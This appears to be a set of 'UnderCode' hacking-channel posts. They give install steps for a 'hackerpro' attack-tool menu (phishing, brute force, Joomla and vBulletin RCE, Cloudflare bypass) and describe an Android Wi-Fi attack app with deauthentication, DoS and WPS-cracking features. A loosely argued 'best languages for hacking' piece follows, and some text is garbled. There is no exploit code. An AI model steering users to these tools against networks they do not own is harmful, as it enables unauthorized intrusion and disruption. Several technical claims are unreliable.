A) Installation for Android

1) install termux

2) apt update

3) apt upgrade

4) apt install git

5) apt install python

6) git clone https://github.com/technicaldada/hackerpro.git

7) cd hackerpro

8) python hackerpro.py

B) Installation for Linux

1) git clone https://github.com/technicaldada/hackerpro.git

2) cd hackerpro

3) python hackerpro.py

🦑Features:


Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKERPRO

🦑Information Gathering

Nmap
Setoolkit
Port Scanning
Host To IP
wordpress user
CMS scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips

🦑Password Attacks

Cupp
Ncrack

🦑Wireless Testing

reaver
pixiewps
Fluxion

🦑Exploitation Tools

ATSCAN
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn

🦑Sniffing & Spoofing

Setoolkit
SSLtrip
pyPISHER
SMTP Mailer

🦑Web Hacking

Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework

🦑Private Web Hacking

Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
ports Scan (common ports)
Get server Info
Bypass Cloudflare

🦑Post Exploitation

Shell Checker
POET
Weeman
@ Mr BotNet(tm)
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘Hack Wifi Termux or /linux gd tool:
(instagram.com/UnderCodeTestingCompany)

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.

2) This application requires an ARM android device with an internal wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Any device that uses the BCM4339 chipset (MSM8974, such as Nexus 5, Xperia Z1/Z2, LG G2, LG G Flex, Samsung Galaxy Note 3) will work with Nexmon (which also supports some other chipsets). Devices that use BCM4330 can use bcmon.

> An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable.

3) The required tools are included for ARM devices. The Nexmon firmware and management utility for BCM4339 and BCM4358 are also included.

Root access is also necessary, as these tools need root to work.

🦑INSTALLATION & RUN:

1) you are on Android 5+

2) you are rooted

3) you have a firmware to support Monitor Mode on your wireless interface

4) download the project https://github.com/chrisk44/Hijacker/releases/tag/v1.5-beta.11

You can get it as an .apk or .tar.gz (or source .zip)

5) Simply get the apk on Android


🦑Features:

1) View a list of access points and stations (clients) around you (even hidden ones)

2) View the activity of a specific network (by measuring beacons and data packets) and its clients

3) Statistics about access points and stations

4) See the manufacturer of a device (AP or station) from the OUI database

5) See the signal power of devices and filter the ones that are closer to you

6) Save captured packets in .cap file

7) Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target)

8) Deauthenticate a specific client from the network it's connected to

9) MDK3 Beacon Flooding with custom options and SSID list

10) MDK3 Authentication DoS for a specific network or to every nearby AP

11) Capture a WPA handshake or gather IVs to crack a WEP network

12) Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)

13) Leave the app running in the background, optionally with a notification
14) Copy commands or MAC addresses to clipboard
15) Includes the required tools, no need for manual installation
16) Includes the Nexmon driver, required library and management utility for BCM4339 and BCM4358 devices

17) Crack .cap files with a custom wordlist

18) Create custom actions and run them on an access point or a client easily

19) Sort and filter Access Points and Stations with many parameters

20) Export all gathered information to a file

21) Add a persistent alias to a device (by MAC) for easier identification

Written by UnderCode
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘Who uses Java? Why it Java the 1st choice for most developers?
t.me/IosDeveloppers


1) 97% of Enterprise Desktops Run Java

2) 89% of Desktops (or Computers) in the U.S. Run Java

3) There are 9 Million Java Developers Worldwide

4) Java is the #1 Choice for Developers

5) Java is the #1 Development Platform

6) 3 Billion Mobile Phones Run Java

7) 100% of Blu-ray Disc Players Ship with Java

8) There are 5 Billion Java Cards in Use

9) 125 million TV devices run Java

10) 5 of the Top 5 Original Equipment Manufacturers Ship Java ME.

@ Mr. BOTNET(tm
- - - - - UNDERCODE - - - -

🦑 Best Programming Languages for Hacking
facebook.com/UnderCodeTestingCompanie

🦑 LET'S START:

1) Python

> The de-facto language for hacking programming, Python is heralded as the best programming language for hacking, and for good reason. Ethical hackers often use this dynamic programming language for scripting their on-demand hacking programs.

Why Python?


> The interpreted nature of Python allows it to run without the need for compilation.

> An easy-to-read language that's helpful for beginning ethical hackers.

> Has a massive community that produces useful 3rd-party plugins/libraries every day.

> One of the best programming languages for hacking into web servers.

> Makes it fairly easy to write automation scripts.

> Python lets you do a fast reconnaissance of the target network and makes prototyping much faster.

2) SQL

> SQL stands for Structured Query Language and is one of the favorite hacking programming languages for ethical hackers. This programming language is used to query and fetch information from databases. As most web-based software stores valuable information like user credentials in some form of a database, SQL is the best programming language for hacking into corporate databases.

🦑 Why SQL?

> SQL is not a traditional programming language and is used only for communicating with databases.

> Hackers use this language to develop hacking programs based on SQL injection.

> SQL is often used by hackers to run unauthorized queries in order to obtain unhashed passwords.

> Popular SQL databases include MySQL, MS SQL, and PostgreSQL.

3) C

> The holy grail of modern programming languages, it's no surprise C is also used extensively in the security industry. The low-level nature of C provides an edge over other languages used for hacking programming when it comes to accessing low-level hardware components such as the RAM.

🦑 Why C?

> C is a low-level fast programming language.

> Most modern systems including Windows and Unix are built using C, so mastery of this language is essential if you want to understand these systems thoroughly.

> C is often used to gain low-level access to memory and system processes after compromising a system.

> Veteran security professionals often use C to simulate the library hijacking attack.

4) JavaScript

> It's the de-facto choice for developing cross-site scripting hacking programs.

> JavaScript can manipulate the browser DOM very easily, thus making it a viable solution for building internet worms. It can be used for mimicking attacks not only on the server side but also on the client side.

> JavaScript is the go-to language for creating adware hacking programs, rising increasingly in recent times.

> Since JavaScript can be used to build cross-platform desktop software, hackers might utilize it for attacks like buffer overflow and stack overflow.

5) PHP

> PHP is used extensively in server-side scripting, so knowledge of this hacking programming language is essential if you want to develop server hacking programs.

> Older PHP websites often contain deprecated scripts; manipulating them effectively can give you easy access to servers.

> A deeper understanding of this hacking coding language means you'll be prepared to take down faulty websites as soon as you spot them.

> PHP is undoubtedly the best programming language for hacking personal websites.

6) C++

> The object-oriented nature of C++ allows hackers to write fast and efficient modern-day hacking programs.

> C++ is statically typed, meaning you can avoid a lot of trivial bugs right at compile time.

> The ability to access low-level system components makes sure hackers can easily reverse engineer enterprise software with this programming language.

> The high-level polymorphism feature allows programmers to write metamorphic computer viruses with C++.

7) Java

> Just like C++, Java is also widely used by hackers to reverse engineer paid software.

> It is used heavily by professional penetration testers to curate scalable servers for delivering payloads.

> Java makes it possible to develop state of the art hacking programs for advanced ethical hackers.

> Contrary to C++, Java is dynamic in nature. This means once you write your hacking programs with Java, you can run them on any platform that supports Java.

> A deeper understanding of Java is integral to developing hacking programs for the Android system.

Written by Mr. BOTNET(tm
- - - - - UNDERCODE - - - -